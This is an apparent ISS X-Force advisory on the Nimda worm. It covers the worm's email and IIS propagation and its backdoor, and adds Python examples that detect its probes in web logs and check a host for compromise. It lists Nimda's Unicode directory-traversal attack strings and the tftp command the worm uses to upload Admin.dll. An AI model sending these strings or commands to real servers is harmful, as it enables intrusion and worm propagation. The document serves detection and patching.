ISS X-Force has captured a new Internet worm, known as Nimda, that contains much of the functionality of the Code Red worm and its derivatives. Nimda attempts to identify vulnerable Microsoft IIS servers and deface them, and attempts to infect additional systems. Nimda is potentially more dangerous than Code Red or Code Blue, because it includes a powerful e-mail distribution component. Code Red was limited to infecting Web servers running IIS. Nimda, on the other hand, can infect any Windows system, and then distribute further by emailing copies of itself to individuals in MAPI (Messaging Application Programming Interface) address books, or by identifying and infecting vulnerable IIS servers. This distinction means that there may be millions of infections. Indications of severe network outages related to the massive amount of network traffic this worm generates have already been reported.
Description:
Nimda is vastly different from Code Red in how it propagates. Nimda takes advantage of standard e-mail distribution techniques to broaden the eligible pool of target hosts. Instead of only attacking Web servers with Web server vulnerabilities, Nimda is designed to propagate via spoofed e-mail. The e-mail is spoofed to appear as if it came from trusted sources. Nimda relies on extensive local propagation once a system is infected. It replaces .dll, .eml, .nws files on all shared drives. It also appends itself to all .htm, .html, and .asp files on the infected system. This also allows the worm to spread to remote users when they access Web pages on infected servers.
IIS Scanning and Propagation
Nimda will use several Unicode Web Folder Traversal vulnerability attack strings to probe for vulnerable IIS systems. The attack strings used are as follows:
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
(root.exe is the backdoor that Code Red II installed on infected servers)
Nimda appends "/winnt/system32/cmd.exe?/c+dir" to the end of each attack string and inspects output to determine if the target system is vulnerable. If a vulnerable IIS Web server is found, Nimda will append the following command to an attack string to upload a copy of the worm to the vulnerable server:
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
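The following Python script is an added example and is not part of the ISS advisory or of any ISS product. It shows why the attack strings above all reach the same place once an unpatched server decodes them (percent-decoding applied twice, followed by a lenient UTF-8 fold that accepts overlong forms such as %c0%af), and uses that decoder to flag probe requests in IIS-style log lines. The log lines are constructed, the W3C field layout (date, time, client IP, method, URI stem, URI query, status) is assumed, and the tftp query string reads the advisory's %%20 and %s as C format-string escapes for %20 and the attacking host's address.

```python
from urllib.parse import unquote_to_bytes

# The advisory's traversal probe strings, copied verbatim.
NIMDA_PROBE_PREFIXES = [
    "/scripts/..%255c..",
    "/_vti_bin/..%255c../..%255c../..%255c..",
    "/_mem_bin/..%255c../..%255c../..%255c..",
    "/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..",
    "/scripts/..%c1%1c..",
    "/scripts/..%c0%2f..",
    "/scripts/..%c0%af..",
    "/scripts/..%c1%9c..",
    "/scripts/..%%35%63..",
    "/scripts/..%%35c..",
    "/scripts/..%25%35%63..",
    "/scripts/..%252f..",
]

# Constructed sample log (not from the advisory), W3C-style fields:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2001-09-18 13:01:02 10.0.0.5 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:01:03 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
2001-09-18 13:01:04 10.0.0.5 GET /MSADC/root.exe /c+dir 404
2001-09-18 13:01:05 10.0.0.9 GET /index.html - 200
2001-09-18 13:01:06 10.0.0.5 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+tftp%20-i%2010.0.0.5%20GET%20Admin.dll%20 502
"""


def lenient_utf8(raw: bytes) -> str:
    """Fold bytes the way the unpatched decoder did: a two-byte lead (0xC0-0xDF)
    plus any following byte becomes one code point, with no check for overlong
    forms or for a valid continuation byte. Only the two-byte form is modelled,
    which is all the advisory's strings use."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def decode_as_vulnerable_iis(path: str) -> str:
    """Percent-decode twice (so %255c -> %5c -> '\\'), then apply the lenient
    UTF-8 fold. The result is the path the unpatched server acted on."""
    return lenient_utf8(unquote_to_bytes(unquote_to_bytes(path)))


def all_probes_decode_to_traversal() -> bool:
    """Sanity check: every advisory probe decodes to a path containing '..'."""
    return all(".." in decode_as_vulnerable_iis(p).replace("\\", "/").split("/")
               for p in NIMDA_PROBE_PREFIXES)


def classify(stem: str, query: str):
    """Return a short reason when a request matches the advisory's probe or
    upload patterns, else None. Detection runs on the decoded path, so every
    encoding variant in the list above is caught by the same rule."""
    segs = decode_as_vulnerable_iis(stem).replace("\\", "/").lower().split("/")
    q = query.lower()
    if "tftp" in q and "admin.dll" in q:
        return "worm upload via tftp"
    if "root.exe" in segs:
        return "Code Red II root.exe probe"
    if ".." in segs and "cmd.exe" in segs:
        return "decoded traversal to cmd.exe"
    if ".." in segs:
        return "encoded traversal"
    return None


def scan_log(text: str):
    """Return (client_ip, stem, reason) for each flagged request."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # comment/header line or unexpected layout
        _date, _time, ip, _method, stem, query, _status = fields
        reason = classify(stem, query)
        if reason:
            hits.append((ip, stem, reason))
    return hits


if __name__ == "__main__":
    for ip, stem, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}  {reason}: {stem}")
```

Decoding before matching is the point: a signature that looks for the literal string "%255c" misses "%%35%63", but both decode to the same "..\" once the server's own decoding steps are replayed, which is why the ISS signatures named below key on URL decoding rather than on a fixed byte pattern.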
E-mail Propagation
Nimda will read the e-mail address books on the infected system. It will e-mail a copy of itself to each address in the list. The Subject: lines of the e-mails containing the worm will vary.
Backdoor Functionality
Once a computer is infected with Nimda, the worm takes steps to "backdoor" the infected system, by creating accounts that could provide further access to the system by remote attackers. Nimda will create a "guest" account if it doesn't already exist, or activate it if it has been disabled. It will also add the guest user to the "Guests" and "Administrators" groups. Nimda will also open the "C:" share to the Internet, giving full access to the C: drive of the infected computer. Attackers from anywhere on the Internet may access this share with full read/write access, once this share is opened.
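The following Python checker is an added example, not part of the advisory or of any ISS tool. It looks for the three host-level indicators described above (an active Guest account, Guest in the Administrators group, and a non-default share exposing a drive root) by parsing output in the layout of the Windows "net user Guest", "net localgroup Administrators" and "net share" commands. The sample output is constructed to show an affected host; on a live system the real command output would be passed to the same functions. Treating any non-hidden share of a drive root as suspect is a heuristic chosen here, not something the advisory states.

```python
import re

# Constructed output (not from the advisory) in the layout of "net user Guest".
NET_USER_GUEST = """\
User name                    Guest
Full Name
Comment                      Built-in account for guest access to the computer/domain
Account active               Yes
Account expires              Never
The command completed successfully.
"""

# Constructed output in the layout of "net localgroup Administrators".
NET_LOCALGROUP_ADMINS = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Guest
The command completed successfully.
"""

# Constructed output in the layout of "net share"; the share named "c" stands
# for the C: drive share the advisory says the worm opens.
NET_SHARE = """\
Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\\                             Default share
IPC$                                         Remote IPC
ADMIN$       C:\\WINNT                        Remote Admin
c            C:\\
The command completed successfully.
"""


def _table_rows(text: str):
    """Yield the lines that follow the dashed separator, up to the trailer."""
    started = False
    for line in text.splitlines():
        if not started:
            started = line.startswith("----")
            continue
        if not line.strip() or line.startswith("The command completed"):
            break
        yield line


def guest_account_active(net_user_out: str) -> bool:
    """True if the 'Account active' row of "net user Guest" says Yes."""
    for line in net_user_out.splitlines():
        if line.startswith("Account active"):
            return line.split()[-1].lower() == "yes"
    return False


def group_members(net_localgroup_out: str):
    """Member names listed by "net localgroup <group>"."""
    return [row.strip() for row in _table_rows(net_localgroup_out)]


def suspicious_drive_shares(net_share_out: str):
    """Shares whose resource is a bare drive root (e.g. C:\\) and whose name is
    not the default hidden X$ form. Heuristic assumed for this example."""
    found = []
    for row in _table_rows(net_share_out):
        parts = row.split()
        if len(parts) < 2:
            continue
        name, resource = parts[0], parts[1]
        if re.fullmatch(r"[A-Za-z]:\\", resource) and not re.fullmatch(r"[A-Za-z]\$", name):
            found.append((name, resource))
    return found


def nimda_backdoor_indicators(user_out: str, group_out: str, share_out: str):
    """Collect the advisory's three backdoor indicators as human-readable strings."""
    indicators = []
    if guest_account_active(user_out):
        indicators.append("Guest account is active")
    if "guest" in (m.lower() for m in group_members(group_out)):
        indicators.append("Guest is a member of Administrators")
    for name, resource in suspicious_drive_shares(share_out):
        indicators.append(f"non-default share '{name}' exposes {resource}")
    return indicators


if __name__ == "__main__":
    for item in nimda_backdoor_indicators(NET_USER_GUEST, NET_LOCALGROUP_ADMINS, NET_SHARE):
        print("INDICATOR:", item)
```

A host showing none of the three is not thereby clean, since the worm's file-level changes (the .eml/.nws copies and the appended .htm/.html/.asp files mentioned under Description) are separate indicators; the three checks above are simply the ones that can be read directly from account and share configuration.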
Recommendations:
ISS RealSecure detects the Nimda worm through the HTTP_IIS_URL_Decoding signature. This signature was included in Network Sensor X-Press Update 3.1 and Server Sensor 6.0.1. RealSecure Network Sensor also detects the Nimda worm with the HTTP_Windows_Executable signature. ISS BlackICE products will trigger the "2000639 - HTTP UTF8 backtick" and "2002595 - IIS system32 command" events. ISS Internet Scanner customers can test for this vulnerability using the IisUnicodeTranslation check, which was included in XPU 4.4 (and later updated in XPU 4.8). ISS System Scanner customers can test for this vulnerability using the MS00-078 check included in XPU 1.13 (#13). ISS X-Force recommends that all users contact their anti-virus vendor for software updates and Nimda removal information.
Microsoft IIS administrators who have not yet installed the patch for the Web Server Folder Traversal vulnerability are encouraged to do so immediately.
For Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862
For Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862
The Nimda worm takes advantage of well-known security weaknesses in IIS, as well as a general lack of security awareness among Internet users regarding e-mail attachments. ISS recommends that all IIS administrators apply all security patches immediately and follow published Microsoft IIS Security Checklists. Please refer to the links in the Additional Information section.
Additional Information:
ISS X-Force recommends that all Web site administrators review the appropriate IIS Security Checklist from Microsoft, and verify that their IIS Web servers have been configured securely. IIS servers that have been configured securely, using the Checklists, are not vulnerable to many of the recent and widely publicized remote IIS exploits.
The IIS Security Checklists are available at the following locations:
For Microsoft IIS 4.0:
http://www.microsoft.com/technet/itsolutions/security/tools/iischk.asp
For Microsoft IIS 5.0:
http://www.microsoft.com/technet/security/iis5chk.asp
Web site administrators are also strongly encouraged to apply the latest IIS cumulative security patch to prevent Web servers from being compromised by this and other IIS exploits. This patch is available from the following Microsoft Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/MS01-044.asp